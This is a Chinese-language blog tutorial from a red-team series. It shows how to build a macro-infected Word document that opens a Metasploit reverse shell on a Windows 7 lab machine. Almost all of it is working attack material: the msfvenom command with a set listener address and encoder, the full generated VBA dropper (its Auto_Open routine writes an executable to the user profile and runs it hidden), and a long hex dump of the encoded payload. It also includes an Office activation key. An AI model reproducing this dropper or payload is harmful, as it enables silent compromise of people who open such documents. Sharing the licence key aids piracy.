红队/白帽必经之路(25)——实战之如何通过Metasploit 及利用宏感染 word 文档获取 shell最后拿下Administrator[既然是红队,那就对自己狠一点]
红队/白帽必经之路(25)——实战之如何通过Metasploit 及利用宏感染 word 文档获取 shell最后拿下Administrator[既然是红队,那就对自己狠一点]
盛透侧视攻城狮
发布于 2024-12-25 09:31:47
发布于 2024-12-25 09:31:47
代码可运行
运行总次数:0
代码可运行
- 首先将 cn_office_professional_plus_2007_dvd_X12-38713.rar 上传到 win7 虚拟上,解压后,安装一下 office。
- office 的激活码: DBXYD-TF477-46YM4-W74MH-6YDQ8
执行生成如下代码
┌──(root㉿kali-2024)-[/home/ljs/Desktop]
└─# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.53 LPORT=4444 -e x86/shikata_ga_nai -i 10 -f vba-exe
Found 1 compatible encoders
Attempting to encode payload with 10 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 381 (iteration=0)
x86/shikata_ga_nai succeeded with size 408 (iteration=1)
x86/shikata_ga_nai succeeded with size 435 (iteration=2)
x86/shikata_ga_nai succeeded with size 462 (iteration=3)
x86/shikata_ga_nai succeeded with size 489 (iteration=4)
x86/shikata_ga_nai succeeded with size 516 (iteration=5)
x86/shikata_ga_nai succeeded with size 543 (iteration=6)
x86/shikata_ga_nai succeeded with size 570 (iteration=7)
x86/shikata_ga_nai succeeded with size 597 (iteration=8)
x86/shikata_ga_nai succeeded with size 624 (iteration=9)
x86/shikata_ga_nai chosen with final size 624
Payload size: 624 bytes
Final size of vba-exe file: 20407 bytes
'**************************************************************
'*
'* This code is now split into two pieces:
'* 1. The Macro. This must be copied into the Office document
'* macro editor. This macro will run on startup.
'*
'* 2. The Data. The hex dump at the end of this output must be
'* appended to the end of the document contents.
'*
'**************************************************************
'*
'* MACRO CODE
'*
'**************************************************************
Sub Auto_Open()
Cwfwm12
End Sub
Sub Cwfwm12()
Dim Cwfwm7 As Integer
Dim Cwfwm1 As String
Dim Cwfwm2 As String
Dim Cwfwm3 As Integer
Dim Cwfwm4 As Paragraph
Dim Cwfwm8 As Integer
Dim Cwfwm9 As Boolean
Dim Cwfwm5 As Integer
Dim Cwfwm11 As String
Dim Cwfwm6 As Byte
Dim Nzhweccciu as String
Nzhweccciu = "Nzhweccciu"
Cwfwm1 = "PviiyFzEArEmQSe.exe"
Cwfwm2 = Environ("USERPROFILE")
ChDrive (Cwfwm2)
ChDir (Cwfwm2)
Cwfwm3 = FreeFile()
Open Cwfwm1 For Binary As Cwfwm3
For Each Cwfwm4 in ActiveDocument.Paragraphs
DoEvents
Cwfwm11 = Cwfwm4.Range.Text
If (Cwfwm9 = True) Then
Cwfwm8 = 1
While (Cwfwm8 < Len(Cwfwm11))
Cwfwm6 = Mid(Cwfwm11,Cwfwm8,4)
Put #Cwfwm3, , Cwfwm6
Cwfwm8 = Cwfwm8 + 4
Wend
ElseIf (InStr(1,Cwfwm11,Nzhweccciu) > 0 And Len(Cwfwm11) > 0) Then
Cwfwm9 = True
End If
Next
Close #Cwfwm3
Cwfwm13(Cwfwm1)
End Sub
Sub Cwfwm13(Cwfwm10 As String)
Dim Cwfwm7 As Integer
Dim Cwfwm2 As String
Cwfwm2 = Environ("USERPROFILE")
ChDrive (Cwfwm2)
ChDir (Cwfwm2)
Cwfwm7 = Shell(Cwfwm10, vbHide)
End Sub
Sub AutoOpen()
Auto_Open
End Sub
Sub Workbook_Open()
Auto_Open
End Sub
'**************************************************************
'*
'* PAYLOAD DATA
'*
'**************************************************************
Nzhweccciu
/*
* 提示:该行代码过长,系统自动注释不进行高亮。一键复制会移除系统注释
* &H4D&H5A&H90&H00&H03&H00&H00&H00&H04&H00&H00&H00&HFF&HFF&H00&H00&HB8&H00&H00&H00&H00&H00&H00&H00&H40&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H80&H00&H00&H00&H0E&H1F&HBA&H0E&H00&HB4&H09&HCD&H21&HB8&H01&H4C&HCD&H21&H54&H68&H69&H73&H20&H70&H72&H6F&H67&H72&H61&H6D&H20&H63&H61&H6E&H6E&H6F&H74&H20&H62&H65&H20&H72&H75&H6E&H20&H69&H6E&H20&H44&H4F&H53&H20&H6D&H6F&H64&H65&H2E&H0D&H0D&H0A&H24&H00&H00&H00&H00&H00&H00&H00&H50&H45&H00&H00&H4C&H01&H03&H00&H51&H66&HF6&H3A&H00&H00&H00&H00&H00&H00&H00&H00&HE0&H00&H0F&H03&H0B&H01&H02&H38&H00&H02&H00&H00&H00&H0E&H00&H00&H00&H00&H00&H00&H00&H10&H00&H00&H00&H10&H00&H00&H00&H20&H00&H00&H00&H00&H40&H00&H00&H10&H00&H00&H00&H02&H00&H00&H04&H00&H00&H00&H01&H00&H00&H00&H04&H00&H00&H00&H00&H00&H00&H00&H00&H40&H00&H00&H00&H02&H00&H00&H46&H3A&H00&H00&H02&H00&H00&H00&H00&H00&H20&H00&H00&H10&H00&H00&H00&H00&H10&H00&H00&H10&H00&H00&H00&H00&H00&H00&H10&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H30&H00&H00&H64&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H2E&H74&H65&H78&H74&H00&H00&H00&H28&H00&H00&H00&H00&H10&H00&H00&H00&H02&H00&H00&H00&H02&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H20&H00&H30&H60&H2E&H64&H61&H74&H61&H00&H00&H00&H90&H0A&H00&H00&H00&H20&H00&H00&H00&H0C&H00&H00&H00&H04&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H20&H00&H30&HE0&H2E&H69&H64&H61&H74&H61&H00&H00&H64&H00&H00&H00&H00&H30&H00&H00&H00&H02&H00&H00&H00&H10&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H40&H00&H30&HC0&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&HB8&H00&H20&H40&H00&HFF&HE0&H90&HFF&H25&H38&H30&H40&H00&H90&H90&H00&H00&H00&H00&H00&H00&H00&H00&HFF&HFF&HFF&HFF&H00&H00&H00&H00&HFF&HFF&HFF&HFF&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&HBD&H34&HAD&H8D&HBC&HDA&HCB&HD9&H74&H24&HF4&H58&H2B&HC9&H66&HB9&H04&H02&H31&H68&H15&H83&HE8&HFC&H03&H68&H25&H4F&H78&H8D&H85&HE7&H8B&HFE&H45&HF8&HEF&H01&H75&H9C&H66&HDD&HCE&HB2&H9D&HAF&HAC&H90&H82&H09&HB8&H02&HCF&HF4&H6B&H82&H9E&H9F&H5A&H4A&HF2&H9C&HC2&H61&H77&H4C&HE8&H83&H33&HB5&HEA&HEA&H12&HC2&HDE&H43&H0B&H2E&HEA&H12&H1A&HEF&H2F&HDC&HC3&H3E&HB4&H1E&H7E&H28&H5D&HA1&HC6&HC5&H98&H89&H31&H95&HEB&HC6&HCE&H24&H3C&H46&H50&H88&HFF&H74&H41&HB4&H0D&H8E&HB0&H19&HA3&H8B&H11&HCE&H92&H4D&H1F&HAC&H8D&HBA&H2F&H8F&HE8&H9E&HEA&HC3&H4E&H3C&H92&H05&HD5&H17&HB7&H62&HE3&H25&H5A&H63&H8D&H35&HDE&H6D&H5A&H29&H6B&H04&HE9&H3A&HFB&H87&H60&H6C&HAF&H49&H4A&H75&H91&H05&H22&H0A&H5D&H77&H00&HDE&H53&H5A&HA6&HA5&HAF&HD0&HDC&HC3&H3C&HF3&HB3&H42&H63&HDF&H13&H8E&HB9&HEF&H15&HC6&HE4&H75&HD0&H77&H3D&HC2&HFE&HE7&H94&H2F&H80&H9B&HBC&H61&H52&HCC&H9D&H72&HA6&H5F&HB5&H77&H07&H43&H4F&H82&H5E&HFA&HF9&HAD&H92&H3D&HC2&H41&H43&HC5&H9A&H02&H7D&H29&H00&H8C&HA1&H3F&HB0&H16&HE9&H73&H89&H96&H17&H39&H42&H56&H74&H23&HB7&H76&H2B&HF9&HD0&H9F&HB5&H5F&H84&H7A&HAB&HA3&H9B&H4A&HC0&H64&HA3&H77&H90&H5A&HE5&H77&H8A&HE1&H90&HEB&HBB&HBB&HA8&H6E&H7D&H14&H29&H82&HBC&HAC&HAF&H14&H21&HB3&H5B&H34&H38&HF3&H7F&HBC&H74&H4C&H13&HB5&H1E&HF3&H6E&H78&H7A&H4B&H0C&H25&H35&H85&H29&H56&H4E&HA5&H0A&H1F&HD4&HC8&H3A&HD3&HF1&H63&H60&HE0&H91&HF6&H05&H08&H0A&HA6&H69&HC2&H7B&H92&HDE&H58&HA3&HA2&HDB&H80&H38&H29&H11&HF7&H69&H8A&H8A&H68&HDA&HAB&HC6&H0A&H14&HCB&H17&HB9&H55&H75&HAB&H4B&HD6&H13&HEA&HCF&H4F&H74&HCA&HA2&HBD&H74&H37&H89&HD5&H9B&H37&H92&H7A&HA4&HE4&HE2&H3A&H0D&H14&HDD&H6B&H0D&H50&H7F&HA9&H8F&H94&H05&HC9&H78&H77&HFA&H67&HDE&HC5&H9E&H09&HBD&H9B&H0F&H18&H54&H02&H70&H52&H73&H00&H0B&H6E&H7B&HB1&H68&HB6&H88&H54&HD2&H1B&HA4&H3B&H64&H52&H40&HFB&HDF&H6D&HD2&HD2&H6E&HF7&H09&HCF&HAF&HB7&H8A&H49&H55&H58&HBA&HC6&H5D&H8B&H66&H50&H10&HB4&HB9&H60&HED&H2D&H03&H3B&H8F&H81&HB8&HB0&H53&H81&H39&H22&HAC&HB3&HCB&HDF&H9C&H68&H21&H1D&H4C&H43&H3B&H65&H6B&H61&H54&H16&H04&HA8&HCC&H72&H82&H45&H5D&HE8&HF7&H0B&H65&H73&H83&H53&HD9&H1D&H42&H73&HAE&HA1&HEA&H87&H9D&HD3&H15&H6C&H52&H9F&H60&H81&H2F&HE8&HEA&HF0&HBF&H0A&H85&H97&H3E&HD0&HA6&H63&H46&H2B&HF8&H89&H33&H8D&H84&H54&HA6&H7C&HA5&H65&H0C&H5B&H66&H1B&H98&H4D&HFD&H04&H1D&HE7&H95&H99&HA8&HFA&H62&HBE&HD1&H07&H08&H29&H96&H53&HC2&H91&HB9&H99&H95&HD5&H84&HD9&H23&HB3&HFB&HEC&HF2&HCE&H0A&HF9&H5A&H3D&H21&HDA&HCF&H6D&HE4&HFD&H12&HC0&HF4&H73&HD0&HAE&H70&HC1&H16&H18&HD0&H16&H82&HB8&HBA&H60&HE7&H45&HD4&H84&HB0&H46&HA5&H00&H43&HA0&HB2&H43&H09&H55&H57&H2E&H19&H49&H55&H0A&HA8&HA2&H15&H67&H76&H6D&HF5&H44&H6B&HA4&H06&HF7&H6A&HE4&HFF&H6F&H20&HAE&HE0&H9B&H70&HD8&H62&H59&H77&HC2&HC4&H7E&H02&H21&H58&H7B&H3C&H36&H20&HFA&H5A&H3B&H00&H26&H48&HEB&HE5&H86&HB2&H04&HC3&HD3&HD9&HF2&H6C&H7B&H60&HE9&H18&H2D&H1C&H7E&HC7&H34&H02&HD3&HA2&HED&HE5&HF7&H22&H37&HBD&H4B&H4C&H03&HF4&HB9&H38&H3A&HD3&H34&H10&HBC&H99&H13&H9A&H86&HA0&H3A&H36&H11&H9A&HCE&H7A&HFB&H3B&H57&HA7&H50&H59&HBC&HF6&H29&HBA&HCB&HF6&HF5&HC9&HB6&HE1&HE2&H71&H96&HAC&H8E&HDE&H2A&HA8&H07&H59&HF7&H7A&H6C&H78&H2D&H41&H26&H08&H00&H93&H24&H4B&HA7&H03&H87&H85&H28&HBE&HF4&H03&H4A&H95&H83&H25&H54&H92&H3B&H63&H0D&H50&H2D&H34&HF8&H2E&HB4&H7A&HD3&H9A&HB5&H2A&HBB&H70&H98&H14&H08&H5C&H0E&H03&HE5&H6F&H97&HB8&H66&HFF&HC4&HC5&H80&HF2&HFC&H75&H2F&H10&H2B&H8A&HF8&H4C&H81&HD2&HE4&H38&H14&H32&HE2&H44&H0D&H1C&H04&HD5&H40&H1F&HD3&H07&H9C&H35&HDC&HEB&H17&H8B&HA5&H7A&H54&HAC&HDB&HDD&H38&H98&HA4&H6B&H1C&H3F&H40&H83&H94&H90&H3E&H3D&H9E&H1D&H2B&H01&H5B&H57&HA2&H95&H51&H09&H22&H5F&HB0&HA2&H4B&HEB&H9A&H3E&H20&HFA&H5D&HD7&H98&H20&H86&H4F&H91&H18&HFA&HE4&H5A&H11&HB5&H4B&HB3&H37&H2A&H7C&H22&H8B&H0A&HA4&HFC&H14&HD6&H8E&H57&HBC&HE6&H70&H1C&HEE&H37&HC4&H2D&H35&H35&H8E&H5F&H2F&H4C&H6C&HB5&HD3&HB2&HCA&HD2&H31&H58&H6A&HFB&HE9&H8E&HAE&H7B&HE9&HCE&HCC&HC0&H47&H85&HD7&H67&H6D&H99&H95&HEA&H4E&H3A&HD1&H4E&HC3&H6C&H6A&HAF&H8A&H36&H97&H96&H2B&H85&H28&H69&HC6&H9F&H4B&H42&H84&H30&HC1&H99&H54&H4E&HD7&HC0&H50&H95&H4D&H37&H74&H36&H97&H3F&H85&H9A&H55&H02&H15&H2A&H61&H9C&HE7&HB0&HD1&H0D&HFA&H73&H0E&HB5&H6A&HFF&H29&HC4&HB6&H4A
*/
/*
* 提示:该行代码过长,系统自动注释不进行高亮。一键复制会移除系统注释
* &HB3&HA8&HDF&H54&H2B&HAB&H93&HDB&H47&H0A&H26&HC9&H56&H6F&HEF&H61&HF6&H28&HF4&HDD&H01&H6A&H22&HEF&HEA&HDD&HF9&H6A&H69&HF7&H94&H1C&HEF&H35&HB8&H0E&HF7&HB7&HEF&HA6&H77&H55&H3A&H31&H8B&H51&H3B&H3B&H5E&H6F&HC1&H26&H8A&HF5&HF4&H4B&HE8&HF5&H95&H3C&H0A&HE2&H29&HD9&HE1&HFE&H1B&H7F&HFA&H3C&H81&H7C&H00&HAF&HD5&H64&HE3&H69&HD8&HD4&H64&H89&H87&H23&HA2&HE2&HE8&H0A&H60&H02&H2F&H98&HC6&HFB&HB3&H8E&HDB&H01&H1D&HAD&H9F&HE2&H4D&H3A&HA2&HBE&H2B&HFF&H9B&H40&H3A&HED&HC3&HD7&H23&HD6&HB2&H32&HCB&H5A&H29&HC4&H35&H0A&HDC&HF9&HE6&H08&H95&H28&H11&HAD&H9F&H74&HA5&H31&H83&H01&H58&H96&HBB&H58&HDA&H50&H15&H1D&HD6&H0B&H2C&H1B&H0B&H8B&H15&H1A&H78&H94&H4C&H0B&HEF&H84&H21&H93&HD7&H6F&HAD&HF0&H7C&HEE&H45&H40&H41&H52&H64&H11&HA1&H3F&H05&HDF&HD6&HAD&H39&H85&HB3&H67&H8D&HD6&HEF&H24&H56&H97&H5F&H2F&H0B&H3F&H00&H69&HBE&HC5&H9B&HC8&H57&H24&H22&H3D&HFD&HA4&HA9&HA2&H38&H99&HCD&H06&HE1&HC1&HB9&HBA&HCA&H94&HA5&H79&H34&HCE&H4A&H11&HE7&H6D&H99&H40&HD6&HAD&H67&H00&H8B&H39&H4E&H19&H75&H07&HD8&H72&H23&HAF&H80&H2D&H1B&HD4&HA4&HFE&H24&HC8&HEC&HBB&H27&HF2&H8D&H0C&HF2&HB2&H8C&HBD&HE2&H21&H68&HEA&HD6&H41&H81&HE0&HE9&H07&H98&H00&H90&H90&H2B&HA2&HF1&HCA&H54&H98&HF6&H0E&HFF&H13&H1A&H00&H9E&H4C&HB8&H44&HE0&HD2&HED&H6A&HEA&H74&HC4&HDC&H35&HA6&H35&H1C&H07&H6E&H90&H96&H3E&HF5&H21&H5C&HED&HE6&H94&H61&H78&HD7&H6B&H41&H6A&HE7&HF7&HF7&HE9&HF6&H73&H13&H80&HAF&H5C&HA0&H49&H87&H82&H5A&H69&H71&H03&H17&H00&H4A&H3F&HC0&HA6&H74&HE9&HC8&HD2&H00&H23&HA5&H71&H8D&H55&H50&H10&H3D&H1E&H0D&HE7&HA0&H44&H57&H64&H1D&HD3&H99&H7B&HEA&H41&H6B&HFB&H4D&H2D&H31&H68&H26&HD2&HC2&H7C&H2E&H5D&HA9&H0D&H20&HCE&H21&H1B&H97&HA8&HF7&HFD&H04&HD7&H91&H61&H96&H47&HDF&H2A&HEB&H08&H3A&H74&H7B&H81&HD3&H3D&HBF&HF5&H2D&H16&HCF&H6B&H30&HE7&H78&HCC&H1E&H43&H9A&H30&HD5&HB6&H7E&H88&H3D&HAA&H47&H62&H37&HC1&HCF&H60&H88&H3E&H53&H11&H81&HD1&H2A&H86&HC6&H01&H91&H5F&H09&H72&HF7&H9E&H04&H3D&HF9&H3A&HFF&H79&H9A&H57&HA2&HFC&H77&H14&H65&HE0&H69&HCB&H24&HDE&H9F&H98&HA8&HB0&HB5&H3A&HB0&H46&HD0&H2C&HF3&H78&H17&HA9&H70&H95&HF5&HBB&H61&H78&H88&H0D&H62&HDD&HE5&HBC&H5F&H6B&H19&HF1&H08&H60&H8D&HAA&H85&HA2&HE5&H1D&H16&H3D&HA2&H4C&HF9&H14&H16&H2F&HCF&H0C&HEB&H51&H9A&H92&H49&H4C&H27&HA9&H4E&H0C&HD5&HBB&H9B&HA8&H28&H73&H99&HAA&HF9&HE2&H13&H49&HD5&H9F&H19&HAF&HD6&H04&H5A&HB9&HB7&H03&H93&H63&H76&HA0&H3E&HC8&H09&H0D&HEC&H89&H55&HB9&H79&HBB&H3E&H00&H1E&H0B&H33&H96&H54&HB4&HFF&HDD&H79&H8A&H54&HA7&H2B&H14&H9B&HA7&HEB&H30&HD0&HF5&H9B&H8D&H4C&H79&H1C&H56&H95&H61&H69&HA7&H6A&H96&H32&H29&H1A&H7E&HD3&H39&H58&H62&HB7&HC5&H6E&HD7&HF8&HDC&H03&H6B&H62&HEE&H0B&H3B&H7B&HA9&HED&H59&H46&HEA&H38&H4C&H8B&H20&H2F&H12&H46&HED&H90&H7D&H09&H5B&H46&H87&H75&H86&H8F&H7B&H47&H82&H3A&H80&H6C&H73&H4F&HD5&HEA&H18&HBB&HA5&H86&H2C&H45&H3D&H81&HE1&HB7&HA6&H3D&HBE&H61&H18&H6E&H07&HE2&H08&HF1&H1F&H06&H75&HE9&HFB&HF1&HBF&H76&H4D&H88&HAC&H55&HE2&H44&HEF&H97&HD8&H9D&H6F&H4A&HA0&HCE&H1B&H9F&H3A&H14&H0B&H08&H37&HBA&HF9&HAC&H84&H51&HB3&HE5&H61&H0E&H25&HB2&H03&H07&HD0&H93&H7D&H2B&HED&H9F&HA7&H64&H0C&H03&H7B&H78&HA9&H58&HE0&HD4&H02&HB6&H3A&H2D&H86&HE7&H0A&H16&H0A&H94&H9B&H84&H40&H6F&H57&H58&HC7&H9F&HDA&H9F&H89&H9D&H22&H55&HFE&HED&H43&HF9&H6F&H1C&H6F&HB0&HC5&H76&HD2&H7F&HFA&H1D&H03&HE7&H0B&H17&H0C&H10&H6A&H1E&HA3&HC4&H18&H39&HC3&H3A&H98&H84&H51&HC3&H3E&H34&H80&H61&H65&HD3&HAF&HEC&H2C&HA5&H85&H69&H17&H30&H98&H8E&HBB&H56&HF1&H99&HDE&HEA&HA8&H63&HE4&H27&HDF&H7F&H9F&H1A&HB0&HF2&H94&HA6&H4E&H9E&H25&H27&H56&H33&HE6&HF8&H95&HD6&H9E&H9E&H17&H3B&H69&H66&HA7&H03&H86&H71&HA9&HA7&H14&H96&H32&H4C&H72&H04&HA3&H61&HD4&H0C&HAE&H72&HF7&HCA&H07&H8F&H29&H77&H2A&HEF&H20&HE7&H16&H53&HC3&H42&H10&HFE&HE3&HBA&H8B&H90&H74&H39&H30&H65&H3D&H64&H87&HAF&HD7&H9A&HF0&HA8&H81&H63&H4F&H39&H1A&H72&H38&HC0&H57&H48&HE3&HB4&HB0&H98&HB3&H86&HBE&H7A&HDA&H2A&H87&H3F&H05&H10&H69&H21&HB6&HF3&H57&H1B&H0C&HB6&HF8&HC8&H96&H56&HB0&HFC&H5C&H40&HAA&HEB&H44&HF3&H2F&HFD&HE1&H9F&H7A&HF9&HEA&HD0&H28&H08&H28&H6E&H34&H15&H5C&H77&H2A&H59&H5E&HD2&H9A&HAC&HF4&H65&H34&HB9&HAE&HF1&H05&HEA&H35&H05&HFD&H10&H52&H13&HEF&HB5&H96&H70&H9C&H27&HD5&HC6&H24&H74&HD5&HCD&HA5&H76&HB2&HED&HBE&HB0&H24&HF2&HBF&H05&HDE&HD1&HC2&HC5&HA9&H63&H36&HE7&H56&HFB&H50&H89&HDE&HB2&H32&H7F&H34&HFD&HEB&HF6&HD2&H46&H94&HD8&H7E&H6F&HF8&H0F&HFA&H57&HD3&H53&HA4&H1C&H7B&H79&HA7&HD7&H9E&H20&H59&HB0&HF7&H19&H20&HFE&H6F&H1A&H58&H08&H48&HB2&H51&HE7&HEE&HB5&H1B&H4D&HED&HC0&H59&H96&HAD&H52&HEF&H1B&H24&HBD&HA8&H2F&H27&HB1&HFC&HD0&HE4&H9D&H11&HF3&H3C&H73&H05&H48&HC9&H2D&H02&HF8&H40&HE6&H77&HF0&H0C&H3E&H8B&H73&H0A&HAE&H3C&HB4&HCA&H3B&H72&H56&HEF&H4D&HB5&H5D&H50&H12&H98&H44&H4F&H81&H61&H06&HA6&HB7&HAB&H49&H26&HB7&H5D&H94&H03&HBA&H23&H0F&H1E&HAE&HD2&H6A&H4B&H92&HCC&H26&HA9&H32&H6F&HC6&H71&H36&HFC&HA5&HD7&H36&H99&HBC&H63&H5F&HE1&H4F&H6D&HA6&HD6&H44&HA3&H0B&H25&H0E&H2F&HD2&H80&HD6&H44&H26&H41&HA5&H94&HF9&H77&H6A&HC3&H3B&H15&H59&HFD&H07&HBF&H62&H7F&H04&H34&H91&HAC&H9C&H32&H1B&H4F&H45&H29&H8A&HB8&H06&HB0&HE9&H29&HCC&HBA&H5D&HB5&H2F&H09&H44&H69&H3C&H67&HA6&HF9&H74&H51&HD7&HB0&HA7&HCB&HA0&H3B&HEF&HBE&HC7&HEF&H51&HF6&H7C&H9C&HF5&H16&H91&H8D&HE5&HC8&HD1&HFC&H29&H1B&H09&HDD&H96&H42&H17&H87&H3B&HE3&H24&HBB&H9F&H34&HD5&H1F&H55&H66&H95&HCF&H3D&H9B&H9C&H92&H52&HC9&H61&H43&HC8&H81&H6B&HE7&H52&HC1&H3A&H01&HCA&HF5&H86&HEC&H98&H35&HCB&H68&H5C&H7C&H94&H4C&H2A&H6D&H02&HAD&H16&HED&HF6&HA2&H55&H58&HD1&HED&HE8&H4D&H1C&H07&H5E&H9D&HC8&H0F&H78&HF8&HAE&HBB&H17&H35&H3D&H1E&HAA&HE5&HC4&HD7&H58&H11&H19&H74&H5D&HF3&H5F&H8B&H13&HB2&H75&HD2&H2E&H4F&H54&HD8&HC3&HE8&HDD&H79&H6E&HB7&H24&H76&HD6&HFB&H21&HFF&H15&H82&HAE&H7E&HE4&HE7&HDA&HBE&H9C&HC1&HC8&H28&H04&HBE&HC8&H3D&H6A&H30&HCB&H9D&HDA&HE2&H62&H18&H96&HA8&H69&HFE&H9A&H58&H3D&H4B&HB8&H14&HA5&H5C&HA8&H09&HE6&HFE&H35&HF4&H75&H52&H30&H0F&HC9&H1B&H60&H24&HB6&HD4&H47&H59&H93&H0D&H7D&H89&HBF&H36&HAD&HA6&HD0&H46&H7D&H9C&H59&HD3&HD7&H9A&H64&H8D&H80&HEC&H2E&HA2&H0A&H86&H3F&H51&H00&H0D&H52&HFA&H0E&H46&HE6&H00&H39&H5E&H57&HDA&H00&HE7&H20&H31&H65&HB0&HFA&H66&HE3&HBC&H68&HF6&H62&HC0&H60&H5C&HD5&H07&H3B&H4A&HAF&H6B&H4C&HD8&H9C&HF6&H4A&HFB&HA3&H0A&H20&HC5&H1B&H3E&HA7&HB3&H52&H0E&H0D&H8C&H11&HDB&H22&HBE&H96&H52&HD8&H20&H01&H3C&HE2&HE8&HE1&H27&H2C&HF5&H15&H0E&HF3&HCF&H08&H82&H51&HF8&HBF&H2F&H35&HE1&H7C&HB9&H0F&HBD&H22&H7D&H58&H8B&H0B&H04&HDB&HC9&H4B&H25&H31&H5E&H10&H57&H80&H50&HB3&HD1&H9D&HFC&H5C&H23&HED&HFC&HAC&H3F&H3E&H67&H9A&H92&HF1&H91&H10&H48&HA6&H5C&H71&H4B&HA1&HBA&HFD&H90&H0F&H9D&H0C&H05&H08&HFE&HED&H81&H0C&H34&H2B&HC3&H99&HE3&HBC&HA8&HE8&HB4&HC2&H6B&H8A&HA4&H69&H73&HE3&H98&H65&H9A&HD1&HB4&H23&HAF&HB5&H3E&H59&H56&H69&HD5&H4C&H8E&H99&H92&HF5&H98&H07&H9F&H78&H77&H80&H22&H96&H90&HD4&HF6&H11&H90&H20&H33&HD4&HA6&HEE&H0A&HB4&HCD&H47&H45&H2C&HE1&H3B&H51&H59&H07&H54&H70&HA2&H41&HBA&H2A&H18&H9D&H53&HDE&H0B&H6E&H04&H40&H1D&H6D&HA9&HB4&H70&HA1&HDA&HD8&H6F&HA6&HFC&HA3&HB9&H64&HD5&HFB&H81&H33&H35&H22&HC2&H0D&HB1&HE9&HE6&HBA&H7C&H6D&H9A&H80&H59&HD4&H98&HD4&HF0&H2F&HF2&HE9&HE8&H18&H0B&H5D&H8A&HEF&H37&H99&H46&H9F&H31&H6C&HBD&H10&HC1&HA2&H30&HE6&HD7&H3F&H43&HC0&H68&H18&H15&HD4&H3E&HA9&H1E&H34&HA3&H81&H6F&HDF&H92&H64&H42&H88&HDA&H1F&HD6&H48&H3F&HFC&HC0&H9E&H13&H85&H80&H99&HAE&H29&HCB&H29&H09&H21&H0D&H58&HD2&H40&HF9&HAA&H5B&H3F&HDE&H8B&HD5&HA6&HB6&HC8&H08&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00